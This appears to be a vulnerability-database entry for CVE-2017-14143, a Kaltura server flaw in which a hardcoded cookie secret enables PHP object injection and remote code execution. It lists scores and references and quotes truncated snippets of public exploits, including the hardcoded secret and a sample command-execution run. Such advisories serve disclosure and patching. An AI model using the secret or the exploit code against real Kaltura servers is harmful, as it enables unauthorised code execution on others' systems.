Published: 19/09/2017 Updated: 27/01/2018

CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10

CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9

VMScore: 760

Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

The getUserzoneCookie function in Kaltura prior to 13.2.0 uses a hardcoded cookie secret to validate cookie signatures, which allows remote malicious users to bypass an intended protection mechanism and consequently conduct PHP object injection attacks and execute arbitrary PHP code via a crafted userzone cookie.

Vulnerable Product	Search on Vulmon	Subscribe to Product
kaltura kaltura server

## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking CookieSecret = 'y3tAno3therS$cr3T' include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info ...

#!/usr/bin/env python # Kaltura <= 1310 RCE (CVE-2017-14143) # telekomsecuritygithubio/2017/09/kaltura-rcehtml # # $ python kaltura_rcepy "examplecom" 0_xxxxxxxx "system('id')" # [~] host: examplecom # [~] entry_id: 0_xxxxxxxx # [~] code: system('id') # [+] sending request # uid=1003(wwwrun) gid=50004(www) gro ...

Kaltura versions 1310 and below suffer from a remote code execution vulnerability ...

Kaltura versions 1310 and below suffer from code execution and cross site scripting vulnerabilities ...

CWE-798 https://telekomsecurity.github.io/assets/advisories/20170912_kaltura-advisory.txt https://github.com/kaltura/server/commit/6a6d14328b7a1493e8c47f9565461e5f88be20c9#diff-0770640cc76112cbf77bebc604852682 http://www.securityfocus.com/bid/100976 https://www.exploit-db.com/exploits/43028/https://www.exploit-db.com/exploits/43876/https://nvd.nist.gov https://www.exploit-db.com/exploits/43876/

CVE-2017-14143

Vulnerability Summary

Vulnerability Trend

Exploits

References

Vulmon Search

About

Products

Connect